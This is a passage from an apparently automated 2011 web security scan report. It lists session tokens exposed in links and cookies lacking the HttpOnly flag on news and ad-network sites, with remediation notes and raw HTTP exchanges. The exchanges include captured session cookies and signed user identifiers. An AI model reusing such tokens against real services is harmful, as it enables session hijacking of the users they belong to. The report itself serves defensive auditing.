Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...
4.6. http://www.fastcompany.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- ContextWeb Start -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=replace&advid=996&token=FACO1" width="1" height="1" border="0">
<!-- ContextWeb End -->
...[SNIP]...
5. Cookie without HttpOnly flag set  previous  next
There are 51 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

5.1. http://teamsugar.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://teamsugar.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: teamsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jj74rf9b5tana4c9qnqn6bimm6; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/
Set-Cookie: fg_locale=0; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: client_locale=US; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: sugarTestGroup=test; expires=Wed, 12-Oct-2011 12:47:53 GMT; path=/
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHkxaznENVLWjwa6r%2F7%2FQyRFoDzvuZz8AHFrPwF2UlWsOSIIMrujdWcpuo8VFkywg9FaGJmF0KJRXqCWs5NNKfWFiSyueATPQRfbR%2B1oC0dkUnnxhQoHq43iqkB01kLggEksGLjY551W6XFy28G0iib7WHLy2wxKaiGtC1Pj3NDByA%3D%3D%7Ca8777ef288ebc1c6896acd503ed0e87922f8d289; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Location: http://www.popsugar.com/community/welcome
Connection: close
Date: Mon, 12 Sep 2011 12:47:53 GMT
Server: lighttpd/1.4.26
Content-Length: 0

5.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...
5.3. http://a.visualrevenue.com/vr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.visualrevenue.com
Path:   /vr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vr.js HTTP/1.1
Host: a.visualrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Cache-control: no-cache="set-cookie"
Content-Type: application/x-javascript
Date: Mon, 12 Sep 2011 12:47:51 GMT
Expires: Wed, 14 Sep 2011 12:47:51 GMT
Last-Modified: Tue, 01 Mar 2011 15:37:51 GMT
Server: nginx/1.0.5
Set-Cookie: AWSELB=0BEDD35ED8E6CA32BF18800A787004E3CF91BCBE3BFFB80FABF921A28E20105DFD0A7192507C14F040EBFEBE46C99980BBB5B288638CA88B7C61B7C4DEF91CE45E362C70;PATH=/;MAX-AGE=1800
Content-Length: 1105
Connection: keep-alive

(function(){function j(h){var b;a:{b=document.cookie.split(";");for(var c=0;c<b.length;c++){for(var a=b[c];a.charAt(0)==" ";)a=a.substring(1,a.length);if(a.indexOf("__vrf=")==0){b=a.substring(6,a.leng
...[SNIP]...
5.4. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
5.5. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1620509&_salt=1964679122&B=10&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:30 GMT
Pragma: no-cache
Content-Length: 846
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

var l = (screen.width - 300) / 2;
var t = (screen.height - 600) / 2;
var pop = window.open('http://adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAAAEAAAAAAAAAAAAA
...[SNIP]...
5.6. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1079030&id=1079199&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
